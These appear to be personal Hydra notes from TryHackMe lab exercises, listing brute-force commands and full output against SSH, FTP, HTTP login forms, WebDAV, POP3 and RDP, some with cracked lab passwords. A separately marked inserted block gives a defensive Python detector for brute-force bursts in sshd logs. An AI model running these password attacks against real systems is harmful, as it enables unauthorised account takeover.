Hydra: Notes

Hydra: Pentesting Hacking Tool - Brute-force password attack

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra)

Hydra source code: https://gitlab.com/kalilinux/packages/hydra

Example of ftp login

hydra -l chris -P /usr/share/wordlists/common.txt ftp://10.10.242.129

Example of ssh login

hydra -l jessie -P /usr/share/wordlists/rockyou.txt 10.10.65.195 ssh

Yet another example of ssh login

target=10.10.33.252
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://$target

Yet another example of ssh login

# hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.68.186 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-23 20:38:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344404 login tries (l:1/p:14344404), ~896526 tries per task
[DATA] attacking ssh://10.10.68.186:22/
[22][ssh] host: 10.10.68.186   login: molly   password: REDACTED
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-23 20:38:49
# hydra -l noraj -P /usr/share/wordlists/rockyou-12.txt 10.10.93.131 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-13 09:18:34
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 555079 login tries (l:1/p:555079), ~34693 tries per task
[DATA] attacking ssh://10.10.93.131:22/
[22][ssh] host: 10.10.93.131   login: noraj   password: cheeseburger
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-13 09:19:08
#

Yet another example of ssh login on a non-standard port (80 instead of 22)

root@X220:/mnt/d/OneDrive/tryhackme/jackofalltrades# hydra -l jack -P jacks_password_list ssh://10.10.148.230 -s 80
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-14 18:30:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 24 login tries (l:1/p:24), ~2 tries per task
[DATA] attacking ssh://10.10.148.230:80/
[80][ssh] host: 10.10.148.230   login: jack   password: REDACTED-PASSWORD
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-14 18:30:07
root@X220:/mnt/d/OneDrive/tryhackme/jackofalltrades#
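The ssh runs above leave a recognisable trace on the target: a burst of failed logins from one source (Hydra opens 16 parallel tasks by default) followed by one successful login once the password is found. The following is an added example, not part of these notes or of Hydra, showing how a defender can flag that pattern in sshd logs; the log lines, the assumed year 2021, and the names SAMPLE_AUTH_LOG, parse_events and detect_bruteforce are all constructed here.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log lines (not taken from the page); the traditional syslog
# timestamp omits the year, so 2021 is assumed when parsing.
SAMPLE_AUTH_LOG = """\
Jan 23 20:38:39 host sshd[1201]: Failed password for molly from 192.0.2.10 port 51200 ssh2
Jan 23 20:38:39 host sshd[1202]: Failed password for molly from 192.0.2.10 port 51201 ssh2
Jan 23 20:38:40 host sshd[1203]: Failed password for invalid user admin from 192.0.2.10 port 51202 ssh2
Jan 23 20:38:40 host sshd[1204]: Failed password for molly from 192.0.2.10 port 51203 ssh2
Jan 23 20:38:41 host sshd[1205]: Failed password for molly from 192.0.2.10 port 51204 ssh2
Jan 23 20:38:42 host sshd[1206]: Accepted password for molly from 192.0.2.10 port 51205 ssh2
Jan 23 20:40:00 host sshd[1300]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Jan 23 20:41:30 host sshd[1301]: Accepted publickey for alice from 198.51.100.7 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_events(log_text, year=2021):
    """Yield (timestamp, result, user, source_ip) for each sshd auth line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(log_text, window_seconds=60, threshold=5):
    """Map source IP -> alert when >= threshold failures fall within window_seconds."""
    by_ip = defaultdict(list)
    for ev in parse_events(log_text):
        by_ip[ev[3]].append(ev)
    alerts = {}
    for ip, events in by_ip.items():
        fails = [e for e in events if e[1] == "Failed"]
        # Sliding window over failure timestamps (log lines are chronological).
        burst = any(
            sum(1 for f in fails[i:] if (f[0] - start).total_seconds() <= window_seconds) >= threshold
            for i, (start, *_) in enumerate(fails)
        )
        if burst:
            last_fail = fails[-1][0]  # a success after the burst suggests a guessed password
            alerts[ip] = {"failures": len(fails), "users": sorted({e[2] for e in fails}),
                          "success_after_burst": any(e[1] == "Accepted" and e[0] >= last_fail for e in events)}
    return alerts
```

The same per-source counting is what tools like fail2ban apply before blocking, and sshd's MaxStartups setting is why Hydra prints the "use -t 4" warning: the server itself throttles unauthenticated parallel connections.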

Example of http-post-form login form

# hydra -l frank -P /usr/share/wordlists/rockyou.txt devguru.local http-post-form "/user/login:_csrf=dKGSvb5OKXIuMHfMk8UAzVUixME6MTYwNzI2NzQ4MDA1NTQxODg1Ng&user_name=frank&password=^PASS^&loginsubmit=Sign In:Username or password is incorrect." -s 8585
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-07 11:06:34
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://devguru.local:8585/user/login:_csrf=dKGSvb5OKXIuMHfMk8UAzVUixME6MTYwNzI2NzQ4MDA1NTQxODg1Ng&user_name=frank&password=^PASS^&loginsubmit=Sign In:Username or password is incorrect.
[STATUS] 259.00 tries/min, 259 tries in 00:01h, 14344140 to do in 923:03h, 16 active
[STATUS] 142.67 tries/min, 428 tries in 00:03h, 14343971 to do in 1675:42h, 16 active
[STATUS] 160.00 tries/min, 1120 tries in 00:07h, 14343279 to do in 1494:06h, 16 active
[STATUS] 129.53 tries/min, 1943 tries in 00:15h, 14342456 to do in 1845:25h, 16 active
[STATUS] 119.97 tries/min, 3719 tries in 00:31h, 14340680 to do in 1992:18h, 16 active
[8585][http-post-form] host: devguru.local   login: frank
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-07 11:46:38
root@T420:/mnt/f/OneDrive/tryhackme/devguru#

Yet another example of http-post-form login form

# hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.68.186 http-post-form "/login:username=molly&password=^PASS^&loginsubmit=Login:Your username or password is incorrect."
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-23 20:33:20
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344404 login tries (l:1/p:14344404), ~896526 tries per task
[DATA] attacking http-post-form://10.10.68.186:80/login:username=molly&password=^PASS^&loginsubmit=Login:Your username or password is incorrect.
[80][http-post-form] host: 10.10.68.186   login: molly   password: REDACTED
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-23 20:33:28
#

Brute-force the Jenkins login form

root@X220:~ # hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost http-post-form "/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password" -s 8080
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-11 08:58:47
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://localhost:8080/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password
[8080][http-post-form] host: localhost   login: admin   password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-11 08:59:38
root@X220:~ #

Yet another example of http-post-form login form

# ip="deliver.undiscovered.thm"
# hydra -l admin -P /usr/share/wordlists/rockyou.txt $ip http-post-form "/cms/index.php:username=admin&userpw=^PASS^&submit=log in:User unknown or password wrong"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-16 19:57:13
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://deliver.undiscovered.thm:80/cms/index.php:username=admin&userpw=^PASS^&submit=log in:User unknown or password wrong
[80][http-post-form] host: deliver.undiscovered.thm   login: admin   password: liverpool
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-16 19:57:38
#

Example of brute-forcing WebDAV

hydra -l wampp -P /usr/share/wordlists/rockyou.txt 10.10.178.82 http-get /webdav

Yet another example of brute-forcing WebDAV

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.25.128 http-get /inferno

Yet another example using http-head instead of http-get

# hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.234.170 http-head
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-13 15:29:12
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[WARNING] http-head auth does not work with every server, better use http-get
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344404 login tries (l:1/p:14344404), ~896526 tries per task
[DATA] attacking http-head://10.10.234.170:80/
[STATUS] 1440.00 tries/min, 1440 tries in 00:01h, 14342964 to do in 166:01h, 16 active
[STATUS] 1443.33 tries/min, 4330 tries in 00:03h, 14340074 to do in 165:36h, 16 active
[STATUS] 1421.00 tries/min, 9947 tries in 00:07h, 14334457 to do in 168:08h, 16 active
[80][http-head] host: 10.10.234.170   login: rascal   password: kaylah
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-13 15:37:42
#

WebDAV on port 8080

root@T420:~# ip=10.10.66.235
root@T420:~# hydra -l joker -P /usr/share/wordlists/rockyou.txt $ip http-get -s 8080
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-16 12:19:49
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344404 login tries (l:1/p:14344404), ~896526 tries per task
[DATA] attacking http-get://10.10.66.235:8080/
[8080][http-get] host: 10.10.66.235   login: joker   password: hannah
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-16 12:20:29
root@T420:~#

Example of brute-forcing ftp

root@X220:~# hydra -l jenny -P /usr/share/wordlists/rockyou.txt 10.10.230.70 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-13 18:18:10
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.10.230.70:21/
[21][ftp] host: 10.10.230.70   login: jenny   password: 987654321
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-13 18:18:55
root@X220:~#

Example of brute-forcing POP3

# hydra -l boris -P /usr/share/set/src/fasttrack/wordlist.txt pop3://10.10.192.132 -s 55007
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-01 20:23:17
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://10.10.192.132:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active
[55007][pop3] host: 10.10.192.132   login: boris   password: secret1!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-01 20:26:15
#

Yet another example of brute-forcing POP3

# hydra -l natalya -P /usr/share/set/src/fasttrack/wordlist.txt 10.10.192.132 -s 55007 pop3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-01 20:44:48
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://10.10.192.132:55007/
[STATUS] 53.00 tries/min, 53 tries in 00:01h, 169 to do in 00:04h, 16 active
[55007][pop3] host: 10.10.192.132   login: natalya   password: bird
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-01 20:47:27
#

Example of brute-forcing RDP

root@T420:~# hydra -t 1 -V -f -l jareth -P /usr/share/wordlists/rockyou.txt rdp://10.10.95.189
....
[3389][rdp] account on 10.10.95.189 might be valid but account not active for remote desktop: login: jareth password: sarah, continuing attacking the account.
....

Practice

>>> THM | Library

>>> THM | Jack of All Trades

>>> THM | Advent of Cyber 1 [2019] - Day 17

>>> THM | GoldenEye

>>> THM | Internal

>>> THM | Year of the Owl

>>> THM | HA Joker CTF
